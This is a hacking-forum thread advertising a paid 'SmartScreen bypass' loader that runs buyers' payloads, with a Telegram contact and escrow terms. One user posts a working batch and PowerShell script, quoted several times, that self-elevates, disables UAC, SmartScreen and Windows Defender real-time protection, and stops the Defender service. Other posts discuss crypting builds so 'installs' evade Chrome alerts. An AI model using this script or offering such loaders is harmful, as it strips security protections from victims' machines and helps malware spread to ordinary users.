Smart Screen Bypass

[EvilCodeZ]

Im offering a loader that bypasses Windows Defender Smart Screen and Chrome download notifications.

The loader will execute your payload [exe, dll, js, vbs, ...]

Price:
- 1 Loader 50$

TG: @EvilCodeZ

All transactions will be made over escrow
No time wasters

 

[EvilCodeZ]

New Prices:
- 1 Loader 80$

 

[kosok11]

What is the file extension of the loader?

 

[gulak]

show us demo about the loader ?!

 

[EvilCodeZ]

show us demo about the loader ?!

 

[mig]

What is the file extension of the loader?

 

[EvilCodeZ]

What is the file extension of the loader?

What is the file extension of the loader?

.exe

 

[DoKitO]

Im offering a loader that bypasses Windows Defender Smart Screen and Chrome download notifications.

The loader will execute your payload [exe, dll, js, vbs, ...]

Price:
- 1 Loader 50$

TG: @EvilCodeZ

All transactions will be made over escrow
No time wasters

Went first and got my loader faster, can recommend

 

[crypt0]

a simple .bat will do exactly this
heres an example (few more things added but does the same)

:: to get run as administrator
set "params=%*"
cd /d "%~dp0" && ( if exist "%temp%\getadmin.vbs" del "%temp%\getadmin.vbs" ) && fsutil dirty query %systemdrive% 1>nul 2>nul || ( echo Set UAC = CreateObject^("Shell.Application"^) : UAC.ShellExecute "cmd.exe", "/k cd ""%~sdp0"" && %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs" && "%temp%\getadmin.vbs" && exit /B )
:: to save my path
set mypath=%~dp0
:: to stop uac
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
reg.exe ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t "REG_DWORD" /d "1" /f
:: to kill client if working
taskkill /f /im client.exe
timeout 5 > NUL
::
powershell -Command "Function EnableDisableSmartScreen($status) {Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name "EnableSmartScreen" -Type DWord -Value 0;If (!(Test-Path "HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter")) {New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" -Force | Out-Null}Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" -Name "EnabledV9" -Type DWord -Value 0};Unblock-File -Path C:\system1\client.exe"
powershell -Command "& {Set-ExecutionPolicy UnRestricted;Set-MpPreference -DisableRealtimeMonitoring $true;sc config WinDefend start=disabled;sc stop WinDefend}"

 

[runtim3]

a simple .bat will do exactly this
heres an example (few more things added but does the same)

:: to get run as administrator
set "params=%*"
cd /d "%~dp0" && ( if exist "%temp%\getadmin.vbs" del "%temp%\getadmin.vbs" ) && fsutil dirty query %systemdrive% 1>nul 2>nul || ( echo Set UAC = CreateObject^("Shell.Application"^) : UAC.ShellExecute "cmd.exe", "/k cd ""%~sdp0"" && %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs" && "%temp%\getadmin.vbs" && exit /B )
:: to save my path
set mypath=%~dp0
:: to stop uac
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
reg.exe ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t "REG_DWORD" /d "1" /f
:: to kill client if working
taskkill /f /im client.exe
timeout 5 > NUL
::
powershell -Command "Function EnableDisableSmartScreen($status) {Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name "EnableSmartScreen" -Type DWord -Value 0;If (!(Test-Path "HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter")) {New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" -Force | Out-Null}Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" -Name "EnabledV9" -Type DWord -Value 0};Unblock-File -Path C:\system1\client.exe"
powershell -Command "& {Set-ExecutionPolicy UnRestricted;Set-MpPreference -DisableRealtimeMonitoring $true;sc config WinDefend start=disabled;sc stop WinDefend}"

Why kill the work of others ?

 

[DoKitO]

a simple .bat will do exactly this
heres an example (few more things added but does the same)

:: to get run as administrator
set "params=%*"
cd /d "%~dp0" && ( if exist "%temp%\getadmin.vbs" del "%temp%\getadmin.vbs" ) && fsutil dirty query %systemdrive% 1>nul 2>nul || ( echo Set UAC = CreateObject^("Shell.Application"^) : UAC.ShellExecute "cmd.exe", "/k cd ""%~sdp0"" && %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs" && "%temp%\getadmin.vbs" && exit /B )
:: to save my path
set mypath=%~dp0
:: to stop uac
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
reg.exe ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t "REG_DWORD" /d "1" /f
:: to kill client if working
taskkill /f /im client.exe
timeout 5 > NUL
::
powershell -Command "Function EnableDisableSmartScreen($status) {Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name "EnableSmartScreen" -Type DWord -Value 0;If (!(Test-Path "HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter")) {New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" -Force | Out-Null}Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" -Name "EnabledV9" -Type DWord -Value 0};Unblock-File -Path C:\system1\client.exe"
powershell -Command "& {Set-ExecutionPolicy UnRestricted;Set-MpPreference -DisableRealtimeMonitoring $true;sc config WinDefend start=disabled;sc stop WinDefend}"

its a .bat & also requires admin, nothing like this

 

[crypt0]

not so hard to turn a .bat into a .exe and this .bat disables UAC and sets reg keys to get admin of course not the only way to do things many many more ways to skin a cat as they say but will do the job none the less

 

[DoKitO]

not so hard to turn a .bat into a .exe and this .bat disables UAC and sets reg keys to get admin of course not the only way to do things many many more ways to skin a cat as they say but will do the job none the less

well but if you turn it into a .exe it gets smartscreen, the purpose of this is to avoid getting smartscreen in the first place
Didnt wanted to discard your work, just 2 different use cases

 

[crypt0]

you didnt expand it i guess ??

the powsershell in the batch does this

powershell -Command "Function EnableDisableSmartScreen($status) {Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name "EnableSmartScreen" -Type DWord -Value 0;If (!(Test-Path "HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter")) {New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" -Force | Out-Null}Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" -Name "EnabledV9" -Type DWord -Value 0};Unblock-File -Path C:\system1\client.exe"
powershell -Command "& {Set-ExecutionPolicy UnRestricted;Set-MpPreference -DisableRealtimeMonitoring $true;sc config WinDefend start=disabled;sc stop WinDefend}"

 

[DoKitO]

you didnt expand it i guess ??

the powsershell in the batch does this

powershell -Command "Function EnableDisableSmartScreen($status) {Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name "EnableSmartScreen" -Type DWord -Value 0;If (!(Test-Path "HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter")) {New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" -Force | Out-Null}Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" -Name "EnabledV9" -Type DWord -Value 0};Unblock-File -Path C:\system1\client.exe"
powershell -Command "& {Set-ExecutionPolicy UnRestricted;Set-MpPreference -DisableRealtimeMonitoring $true;sc config WinDefend start=disabled;sc stop WinDefend}"

I think you dont understand what this loader does, check the viedo. it does not disable smartscreen but bypasses it so you dont get the initial smartscreen window

 

[crypt0]

I think you dont understand what this loader does, check the viedo. it does not disable smartscreen but bypasses it so you dont get the initial smartscreen window

yup i understand what ya saying bro and it indeed does what it says on the tin it seems its a nice and simple solution for someone that doesnt want to/cant write there own dropper +1
correct bypassing and disabling are 2 different things without a doubt and both have there time and place based on what you are trying to achieve
although the end goal is the same regardless in regards getting around smart screen both are effective in there own right I would say

 

[thecount]

I think you dont understand what this loader does, check the viedo. it does not disable smartscreen but bypasses it so you dont get the initial smartscreen window

smart screan focun on exe most of the time as i understand

 

[vdh83]

so lot of spam ... is good or nope tottally?

 

[Mellstroy]

Вчера сделал, сегодня хром алерт ругается, пытаюсь выяснить нужно ли криптануть его лодер отдельно или нужно еще раз дать ему криптованный билд, молчит(
Так и не смог запустить инсталлы.

 

[vdh83]

Вчера сделал, сегодня хром алерт ругается, пытаюсь выяснить нужно ли криптануть его лодер отдельно или нужно еще раз дать ему криптованный билд, молчит(
Так и не смог запустить инста

nu a kogda on tebe daval i ti proveryal / vse bilo zbs ?? esli da to ti prosto upustil vremya poka ono spalilos